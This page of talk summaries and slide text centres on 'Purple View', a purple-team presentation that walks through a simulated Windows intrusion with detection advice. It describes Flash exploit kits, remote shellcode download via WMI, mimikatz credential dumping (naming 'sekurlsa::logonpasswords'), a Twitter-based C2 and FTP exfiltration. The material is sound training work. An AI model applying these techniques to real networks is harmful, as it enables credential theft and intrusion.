PurpleSharp is an open-source adversary simulation tool written in C# that executes adversary techniques against Windows environments. The resulting telemetry can be leveraged to measure and improve the efficacy of a detection program. PurpleSharp executes different behavior across the attack lifecycle following the MITRE ATT&CK Framework’s tactics: execution, persistence, privilege escalation, credential access, lateral movement, etc.
These are the slides from my "Active Defense - Helping threat actors hack themselves!" presentation at the BSides Columbus Information Security Conference on 03/02/2018 in Columbus, Ohio.
The document discusses the stages of a network attack from an attacker's perspective. It describes how attackers first perform reconnaissance to gather information about a target network such as open ports, services and vulnerabilities. It then discusses how attackers use this information to directly attack systems using exploits or malware. Finally, it mentions how attackers aim to maintain access and cover their tracks after gaining entry. The goal is to provide an overview of the attack process and challenges for network defense.
This document discusses tactics for red team operations on Windows networks. It begins by covering techniques for gaining initial access and situational awareness, such as using PowerShell commands to enumerate users, computers, and network information. It then discusses abusing domain trust relationships and using PowerView to operate across trusts. Escalation techniques like PowerUp for privilege escalation and Mimikatz for token manipulation are also covered. The document discusses persistence methods like Golden Tickets and WMI. It finally covers techniques for locating and accessing file shares to retrieve sensitive information, using PowerView commands. The overall message is that while tactics remain the same, tools and implementations are continually evolving to facilitate red team operations.
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesJorge Orchilles
Presented at the inaugural SANS Purple Team Summit & Training event, this presentation covers performing a high value adversary emulation exercise in a purple team fashion (red and blue team sitting together throughout the entire engagement).
This talk will introduce a relatively new concept in Threat Hunting by explaining how external threat hunters use similar techniques to Red teamers to create a repeatable hunting model through the use of an intermediary payload system to provide insight, awareness, and action.
David Maynor, @Dave_Maynor, Black Lotus Labs Analysis Lead, Centurylink
Jorge Orchilles, @jorgeorchilles, CTO, SCYTHE
Platform Security IRL: Busting Buzzwords & Building BetterEqual Experts
Practical tips and heroic war stories on how to secure a large, modern, fast software delivery platform. From building a team to building cool stuff, dealing with organisational setups to dealing with security incidents.
Zero Buzzwords Guaranteed.
Chris Rutter has spent the last few years obsessed with making security, engineering and the business work together. Starting his career as an engineer, he uses a deep understanding of Agile, Devops, and product delivery to solve security problems in a way that enables teams, rather than hitting them with bricks.
cumartesi günü düzenlenen PHP Meetup 011'de konu Wordpress'ti. Bizde Doruk Fişek ile birlikte bir joint sunum gerçekleştirdik. Ben işin Wordpress Security tarafını o ise Wordpress Sunucu Güvenliği tarafını ele aldı. Benim sunumuma aşağıdaki slideshare bağlantısı üzerinden ulaşabilirsiniz.
2023 NCIT: Introduction to Intrusion DetectionAPNIC
APNIC Senior Security Specialist Adli Wahid presents an Introduction to Intrusion Detection at the 2023 NCIT, held in Suva, Fiji from 17 to 18 August 2023.
Introduction to Just in Time Access - BrightTalkHaydn Johnson
Ensuring users have access to only the resources they need, aka least privilege is great. But have you considered granting users only needed access?
This talk will introduce the concept of granting ‘Just-in-Time Access’. Securing an endpoint is more than patching and vulnerability management. Granting access to who, when and what also secures an endpoint. Only when a user needs to connect to a system, can access be granted. Ports such as SSH do not need to be open for the world to connect and probe. Database credentials do not need to last forever.
This approach limits the damage that can be caused by an account -- privileged or otherwise -- by reducing the amount of time an attacker has to gain access to the account, as well as the time they have to move from a compromised account before losing access.
The short explanation for Just-in-Time Access is providing short-term access in real time. It is a relatively new term in the industry and is another way to practice the least privileged best practice.
Key Takeaways:
• The benefits to Just-in-Time access for security and operations
o Improved visibility
o Minimize damage from compromised accounts
o Operational efficiency
• How SSH can be replaced with AWS SSM sessions
o Direct SSH replacement
o SSH reverse proxy
• How Just in Time Access for database credentials can help
o Example: Hashicorp Vault
o Example: Akeyless
• Resources for learning more
Communication to the business is very different to exploitation. This talk helps bridge the gap between a finding and a business risk.
Presented at HackFest 2018
Human(e) Security in a World of Business 2018Haydn Johnson
Relationship Building in Security is extremely important.
Understand where I came from, where I am at, struggles I had and things I found work to help improve the security Posture of my organizaiton.
This document outlines how to conduct Purple Team exercises using the Cyber Kill Chain and Extended Cyber Kill Chain frameworks. It discusses:
- Terminology related to purple teaming, red teaming, and blue teaming.
- The purple team process of conducting focused penetration testing with clear training objectives for the blue team.
- The Cyber Kill Chain and Extended Cyber Kill Chain models and how they can be used for exercises.
- Other frameworks like ATT&CK that can aid exercises.
- The different phases and teams involved in cyber exercises.
- Examples of exercises that could be done using various tools and techniques mapped to the kill chains, like port scanning with Nmap and collecting credentials with Mim
Purple Teaming is the idea of using a Red Team exercise with clear training objectives for the Blue Team.
Great exercises should not just be focused on testing a product, they should also test your active Blue Team members and their skills. But how does one start to think about a Purple Team exercise, how does one go about running one and what does it look like?
In this talk we will explain what, why and how, to plan an effective purple team exercise and give some examples. Most enterprise networks are Windows heavy so examples will heavily lean on this.
Testing Assumptions, gaps, blind spots is what being proactive is all about. This talk is both for the console folks and non-console folks.
Phishing for clicks is like the VA portion of a Pentest. It feels nice being a hacker, but that fuzzy feeling wears off quickly, once you learn about command and control.
Everyone knows in theory what phishing is, what phishing emails looks like, they even may even theoretically know how it all works.
What about executing a Phishing campaign? This talk will show you the journey of setting up and executing a Phishing campaign to gain command and control. I have tried a few frameworks, coded some pages myself and will show the way I learned to Phish.
This is not just about sending an email and a link, this is about bypassing the email minefield to get the email to the target and having the payload call back out of the network.
We will go through:
Choosing and setting up a Phishing Framework
Cloning a site
Testing delivery and bypassing Spam filters with a payload (Click Once)
Testing different user interactions for executing payloads
Learning different payloads for command and control
This report is to explain some key commands within Meterpreter that allow you to have some sort of situational awareness. That is, how to gain more insight into system information, the user you currently are and what processes are running among other things.
This document provides a step-by-step guide to creating persistence with PowerSploit and the Veil Framework. It begins by using Veil-Evasion to generate a reverse Meterpreter payload, then extracts the base64 encoded payload to use in a PowerSploit persistence script. PowerSploit is used to generate a persistence script that will execute the payload and send a reverse shell to the attacker whenever a user logs into the victim machine. It also provides an alternative manual method using PowerShell commands directly without the PowerSploit script.
HCL Notes and Domino License Cost Reduction in the World of DLAUpanagenda
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-and-domino-license-cost-reduction-in-the-world-of-dlau/
The introduction of DLAU and the CCB & CCX licensing model caused quite a stir in the HCL community. As a Notes and Domino customer, you may have faced challenges with unexpected user counts and license costs. You probably have questions on how this new licensing approach works and how to benefit from it. Most importantly, you likely have budget constraints and want to save money where possible. Don’t worry, we can help with all of this!
We’ll show you how to fix common misconfigurations that cause higher-than-expected user counts, and how to identify accounts which you can deactivate to save money. There are also frequent patterns that can cause unnecessary cost, like using a person document instead of a mail-in for shared mailboxes. We’ll provide examples and solutions for those as well. And naturally we’ll explain the new licensing model.
Join HCL Ambassador Marc Thomas in this webinar with a special guest appearance from Franz Walder. It will give you the tools and know-how to stay on top of what is going on with Domino licensing. You will be able lower your cost through an optimized configuration and keep it low going forward.
These topics will be covered
- Reducing license cost by finding and fixing misconfigurations and superfluous accounts
- How do CCB and CCX licenses really work?
- Understanding the DLAU tool and how to best utilize it
- Tips for common problem areas, like team mailboxes, functional/test users, etc
- Practical examples and best practices to implement right away
UiPath Test Automation using UiPath Test Suite series, part 6DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 6. In this session, we will cover Test Automation with generative AI and Open AI.
UiPath Test Automation with generative AI and Open AI webinar offers an in-depth exploration of leveraging cutting-edge technologies for test automation within the UiPath platform. Attendees will delve into the integration of generative AI, a test automation solution, with Open AI advanced natural language processing capabilities.
Throughout the session, participants will discover how this synergy empowers testers to automate repetitive tasks, enhance testing accuracy, and expedite the software testing life cycle. Topics covered include the seamless integration process, practical use cases, and the benefits of harnessing AI-driven automation for UiPath testing initiatives. By attending this webinar, testers, and automation professionals can gain valuable insights into harnessing the power of AI to optimize their test automation workflows within the UiPath ecosystem, ultimately driving efficiency and quality in software development processes.
What will you get from this session?
1. Insights into integrating generative AI.
2. Understanding how this integration enhances test automation within the UiPath platform
3. Practical demonstrations
4. Exploration of real-world use cases illustrating the benefits of AI-driven test automation for UiPath
Topics covered:
What is generative AI
Test Automation with generative AI and Open AI.
UiPath integration with generative AI
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Ivanti’s Patch Tuesday breakdown goes beyond patching your applications and brings you the intelligence and guidance needed to prioritize where to focus your attention first. Catch early analysis on our Ivanti blog, then join industry expert Chris Goettl for the Patch Tuesday Webinar Event. There we’ll do a deep dive into each of the bulletins and give guidance on the risks associated with the newly-identified vulnerabilities.
Introduction of Cybersecurity with OSS at Code Europe 2024Hiroshi SHIBATA
I develop the Ruby programming language, RubyGems, and Bundler, which are package managers for Ruby. Today, I will introduce how to enhance the security of your application using open-source software (OSS) examples from Ruby and RubyGems.
The first topic is CVE (Common Vulnerabilities and Exposures). I have published CVEs many times. But what exactly is a CVE? I'll provide a basic understanding of CVEs and explain how to detect and handle vulnerabilities in OSS.
Next, let's discuss package managers. Package managers play a critical role in the OSS ecosystem. I'll explain how to manage library dependencies in your application.
I'll share insights into how the Ruby and RubyGems core team works to keep our ecosystem safe. By the end of this talk, you'll have a better understanding of how to safeguard your code.
For the full video of this presentation, please visit: https://www.edge-ai-vision.com/2024/06/building-and-scaling-ai-applications-with-the-nx-ai-manager-a-presentation-from-network-optix/
Robin van Emden, Senior Director of Data Science at Network Optix, presents the “Building and Scaling AI Applications with the Nx AI Manager,” tutorial at the May 2024 Embedded Vision Summit.
In this presentation, van Emden covers the basics of scaling edge AI solutions using the Nx tool kit. He emphasizes the process of developing AI models and deploying them globally. He also showcases the conversion of AI models and the creation of effective edge AI pipelines, with a focus on pre-processing, model conversion, selecting the appropriate inference engine for the target hardware and post-processing.
van Emden shows how Nx can simplify the developer’s life and facilitate a rapid transition from concept to production-ready applications.He provides valuable insights into developing scalable and efficient edge AI solutions, with a strong focus on practical implementation.
Have you ever been confused by the myriad of choices offered by AWS for hosting a website or an API?
Lambda, Elastic Beanstalk, Lightsail, Amplify, S3 (and more!) can each host websites + APIs. But which one should we choose?
Which one is cheapest? Which one is fastest? Which one will scale to meet our needs?
Join me in this session as we dive into each AWS hosting service to determine which one is best for your scenario and explain why!
Best 20 SEO Techniques To Improve Website Visibility In SERPPixlogix Infotech
Boost your website's visibility with proven SEO techniques! Our latest blog dives into essential strategies to enhance your online presence, increase traffic, and rank higher on search engines. From keyword optimization to quality content creation, learn how to make your site stand out in the crowded digital landscape. Discover actionable tips and expert insights to elevate your SEO game.
Fueling AI with Great Data with Airbyte WebinarZilliz
This talk will focus on how to collect data from a variety of sources, leveraging this data for RAG and other GenAI use cases, and finally charting your course to productionalization.
Building Production Ready Search Pipelines with Spark and MilvusZilliz
Spark is the widely used ETL tool for processing, indexing and ingesting data to serving stack for search. Milvus is the production-ready open-source vector database. In this talk we will show how to use Spark to process unstructured data to extract vector representations, and push the vectors to Milvus vector database for search serving.
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc
How does your privacy program stack up against your peers? What challenges are privacy teams tackling and prioritizing in 2024?
In the fifth annual Global Privacy Benchmarks Survey, we asked over 1,800 global privacy professionals and business executives to share their perspectives on the current state of privacy inside and outside of their organizations. This year’s report focused on emerging areas of importance for privacy and compliance professionals, including considerations and implications of Artificial Intelligence (AI) technologies, building brand trust, and different approaches for achieving higher privacy competence scores.
See how organizational priorities and strategic approaches to data security and privacy are evolving around the globe.
This webinar will review:
- The top 10 privacy insights from the fifth annual Global Privacy Benchmarks Survey
- The top challenges for privacy leaders, practitioners, and organizations in 2024
- Key themes to consider in developing and maintaining your privacy program
Skybuffer SAM4U tool for SAP license adoptionTatiana Kojar
Manage and optimize your license adoption and consumption with SAM4U, an SAP free customer software asset management tool.
SAM4U, an SAP complimentary software asset management tool for customers, delivers a detailed and well-structured overview of license inventory and usage with a user-friendly interface. We offer a hosted, cost-effective, and performance-optimized SAM4U setup in the Skybuffer Cloud environment. You retain ownership of the system and data, while we manage the ABAP 7.58 infrastructure, ensuring fixed Total Cost of Ownership (TCO) and exceptional services through the SAP Fiori interface.
GraphRAG for Life Science to increase LLM accuracyTomaz Bratanic
GraphRAG for life science domain, where you retriever information from biomedical knowledge graphs using LLMs to increase the accuracy and performance of generated answers
Your One-Stop Shop for Python Success: Top 10 US Python Development Providersakankshawande
Simplify your search for a reliable Python development partner! This list presents the top 10 trusted US providers offering comprehensive Python development services, ensuring your project's success from conception to completion.
Generating privacy-protected synthetic data using Secludy and MilvusZilliz
During this demo, the founders of Secludy will demonstrate how their system utilizes Milvus to store and manipulate embeddings for generating privacy-protected synthetic data. Their approach not only maintains the confidentiality of the original data but also enhances the utility and scalability of LLMs under privacy constraints. Attendees, including machine learning engineers, data scientists, and data managers, will witness first-hand how Secludy's integration with Milvus empowers organizations to harness the power of LLMs securely and efficiently.
Generating privacy-protected synthetic data using Secludy and Milvus
Purple View
1. Purple View
The recent trend of using Attack and Defense
Together
Not OUR idea - backed by many
@raffertylaura | @haydnjohnson
2. Quick who are we
Haydn Johnson
@haydnjohnson
OSCP
Offensive/Attack Interest
Enjoys presenting
Laura
@raffertylaura
MSc Computer Science
(Security/Privacy)
Interested in both sides of security
Loooooves presenting
@raffertylaura | @haydnjohnson
3. Contents
1. Basic Term Definition
2. Introduction to Red, Blue and Purple
3. Run through of an Attack
○ Gaining Access
○ Lateral Movement
○ Domain Admin
○ Maintaining Access
○ Data Exfiltration
4. For each attack:
○ Attacking View
○ Defenders View
○ Possible Purple Team exercises
@raffertylaura | @haydnjohnson
4. Definitions
Exploit - The thing used to gain unauthorized access to a system
Payload - What is done after the access is gained (shell, command)
Metasploit - An open source exploit framework, modular
Meterpreter - an advanced, extensible payload that uses in-memory DLL injection
Shell - Gaining Terminal/CMD access remotely
https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/
http://www.metasploit.com/
5. Red Team - Penetration | Offensive
● Scans
● Exploits
● Logic abuse
● Access to things they shouldn’t
@raffertylaura | @haydnjohnson
6. Blue Team - Block, Prevent, Detect | Defensive
● Logs
● Emails
● Events
● Triggers
● Networking
● More Logs
@raffertylaura | @haydnjohnson
7. Red Team - Goals
● Model recent threats and trends
● Longer term
● Highlight Gaps in Security Controls, detection etc
● Escape and Evade for Persistence
@raffertylaura | @haydnjohnson
8. Blue Team - Goals
● Detect Attack
● Respond and Recover
● Produce Actionable Intelligence
● Identify Gaps and investment needs
@raffertylaura | @haydnjohnson
9. Purple Team - Offensive & Defensive
Working together to achieve the ultimate goal of making the organization more
secure
● Exposes blue team to different threats & attacker mindset
● Test incident detection and response
● Allows red team to sharpen skills
● Policy and procedures tested
● Tuning of controls
@raffertylaura | @haydnjohnson
10. Purple Team - Offensive & Defensive
Different types of Purple Teaming
● Read Team Sitting with Network Defense team
● Adversary Simulation
● Traffic Generation
● cobaltstrike.com
● Wargaming
Requires total picture involving all areas of the organization
@raffertylaura | @haydnjohnson
11. Purple Team - The difference
● Using Security Posture and Weaknesses to find what is most valuable
● Goal Oriented
● Review attack
● Test how teams use services and how they are managed
@raffertylaura | @haydnjohnson
12. Purple Team - The difference
● Time to Domain Admin
● Time to Data/Objective
● Time to Respond
● Time to Recover
● Identify where there needs to be more investment
● Measure Impact
Done right, the blue team should come out with better monitoring and response
plans.
@raffertylaura | @haydnjohnson
13. Purple Team - The difference
● Set up a fake scenario - Assume Breach
● How will the attacker gain access?
● Why have they attacked, what do they want?
● How did they move through the network?
● If they exfiltrated data, how?
Do not turn off servers, block IP addresses, make it realistic
@raffertylaura | @haydnjohnson
14. Purple Team - Exercise
“In the beginning, it’s easy to challenge and exercise a network defense team. You
will find that many network defenders do not have a lot of experience (actively)
dealing with a sophisticated adversary.”
- Raphael Mudge
http://blog.cobaltstrike.com/2014/11/12/adversary-simulation-becomes-a-thing/
@raffertylaura | @haydnjohnson
15. Purple Team - DEMO (step by step)
Our exercise
@raffertylaura | @haydnjohnson
17. Tools Used
Red Team:
● Kali Linux
● Metasploit
● Meterpreter
● PowerSploit
● Twittor
Blue Team:
● Wireshark
● Windows Event Logs
@raffertylaura | @haydnjohnson
20. Flash Exploits
@raffertylaura | @haydnjohnson
● Flash plugins are vulnerable
○ You can embed a javascript/binary within a Flash file
○ ActionScript to define events to redirect to landing page
● Most exploit kit landing pages redirect to pages containing Flash exploits
○ Angler
○ Nuclear
○ Fiesta
● Installed by default on browser
● New vulnerabilities are identified on almost a weekly basis
30. B: What can you take away
Security Onion, implement it, free
Has snort rules for Flash exploits (need to install)
Confirm if flash is needed for business reasons
Keep flash updated
2811962 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 SSL
Cert (trojan.rules)
2811963 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119
CnC Beacon (trojan.rules)
@raffertylaura | @haydnjohnson
https://www.security-database.com/detail.php?alert=CVE-2015-5119
https://security-onion-solutions.github.io/security-onion/
31. Purple Team - Exercise
● Blue team understands how attackers can gain initial access
● Flash exploits - ongoing issue
● Helps blue team to identify suspicious traffic and what is happening from the
attacker perspective
● Red team sees how attacks are visible by blue team and think of ways to
make it more stealthy
@raffertylaura | @haydnjohnson
37. PowerView
Part of PowerShell Empire
Very advanced
https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
@raffertylaura | @haydnjohnson
38. A: Lateral Movement
The same local Administrator account passwords on multiple computers.
by Sean Metcalf
https://adsecurity.org/?p=1684
@raffertylaura | @haydnjohnson
42. A: Base64 Encoding Payload
Remove issues with whitespace
The Hacker Playbook 1 (now 2)
@raffertylaura | @haydnjohnson
http://thehackerplaybook.com/dashboard/
43. A: Hosting Powersploit Invoke--Shellcode.ps1
PowerSploit code hosted on local Kali machine
@raffertylaura | @haydnjohnson
44. A: Invoke-WmiMethod
Use powershell to connect remotely, create a new process and launch the IEX
cradle.
Calls Windows Management Instrumentation (WMI) methods.
The Win32_Process WMI class allows creation of a process.
@raffertylaura | @haydnjohnson
45. A: Execute Remote command
Execute command from Client1 to tell Client2 to download and execute shellcode
@raffertylaura | @haydnjohnson
46. A: Client1 gives same password
Same password across multiple clients
@raffertylaura | @haydnjohnson
54. B: PowerShell connects to Kali
Client2 reaches out to Kali on port 80
@raffertylaura | @haydnjohnson
55. B: What can you take away
Event Correlation - based on event ID, source and destination for remote
connections
Implement alerting based on Security Events together
SIEM can/SHOULD do this
Use Log MD - really great logging tool, especially for powershell
@raffertylaura | @haydnjohnson
http://brakeingsecurity.com/2015-042-log_md-more-malware-archaeology-and-sifting-
through-the-junk
http://malwarearchaeology.squarespace.com/log-md/
56. Purple Team - Benefits
● Identify ways to move around the network
● Identify and confirm Defensive Controls in Place
● Identify what worked, what did not
● Implement changes
● Justification for resources
@raffertylaura | @haydnjohnson
58. A: Local Admin to Domain Admin
@raffertylaura | @haydnjohnson
● Why escalate privileges from Local Admin to Domain Admin?
● Domain admin - control over active directory!
● Access IT resources
● Create accounts
● Propagate malware
59. A: Local Admin to Domain Admin
@raffertylaura | @haydnjohnson
60. A: Local Admin to Domain Admin
From Client1, map the admin$ share on Client2 and copy over sekurlsa.dll
@raffertylaura | @haydnjohnson
61. A: Local Admin to Domain Admin
Use psexec to run mimikatz.exe on Client2
@raffertylaura | @haydnjohnson
62. A: Local Admin to Domain Admin
Use sekurlsa::logonpasswords to dump the Domain Admin logon credentials from
Client2!
@raffertylaura | @haydnjohnson
67. B: What can you take away
● Prevention:
○ Access control for shared drive
○ Limit access to psexec and monitor use
○ Active Directory best practices
● Detection:
○ IDS signatures
○ SIEM use case - Event correlation between system logs and network proxy logs
○ For lateral movement: enable file level auditing
○ Canary accounts
68. Purple Team - Benefits
● Blue team observes vulnerabilities/threats which may not have been
considered
○ Learns how attacker could escalate privileges from local admin to domain admin
● Red team observes the footprint left behind from this attack and possibly how
to minimize it
○ Can identify potential weaknesses in blue team monitoring/response processes
○ Provide more thorough recommendations
@raffertylaura | @haydnjohnson
77. B: Twittor - Network Traffic
Reaching out to API
Normal User Traffic??
@raffertylaura | @haydnjohnson
78. B: Twittor - Client system
Backdoor as Python Executable compiled with --no-console flag to hide output
@raffertylaura | @haydnjohnson
79. B: Traffic from Client
Reaches out to twitter
Src and Destination are internal IPs, sends to API
@raffertylaura | @haydnjohnson
80. B: What can you take away
Check if there are any remote connections after hours, is it against policy?
Again, Correlate logs with known C2 addresses
See if AV picks it up
@raffertylaura | @haydnjohnson
81. Purple Team - Benefits
Test if a C2 can reach out to twitter.
Social Media may be blocked via the browser, but some sites can still be
accessed via API etc.
If it is not blocked, why not, can your blue team help to stop this and others.
@raffertylaura | @haydnjohnson
91. B: What can you take away?
@raffertylaura | @haydnjohnson
Disable FTP - should not have a business need for it really
If there is a business need whitelist those IP addresses | Create a group of users
specifically for FTP
92. Purple Team - Exercise
Clear Text
Will any alarms trigger?
Understand potential holes in alerting
Measure time to detect and respond
@raffertylaura | @haydnjohnson
94. Purple Team - Reiteration
Provides more value than a Penetration Test
Should be implemented into a regular schedule
Helps train security personnel
Helps make sure your boxes are tuned
@raffertylaura | @haydnjohnson
95. Limitations and Future Work
● So far we have limited detection tools to Windows Server event logs and
Wireshark, (and a bit of Snort)
● Could be extended for enterprise security tools such as SIEM/IDS
● Powershell/WMI for blue team
● More advanced attacks, persistence using Powershell Empire
@raffertylaura | @haydnjohnson
98. Microsoft - 8 minute Video
https://azure.microsoft.com/en-us/documentation/videos/red-vs-blue-internal-security-penetration-testing-of-microsoft-azure/
@raffertylaura | @haydnjohnson
99. Seeing Purple: Hybrid Security Teams for the
Enterprise - BSides Jackson 2013
http://www.slideshare.net/beltface/hybrid-talk
@raffertylaura | @haydnjohnson
100. A: Downloads PowerShell file
Client2 reaches out to Kali machine
@raffertylaura | @haydnjohnson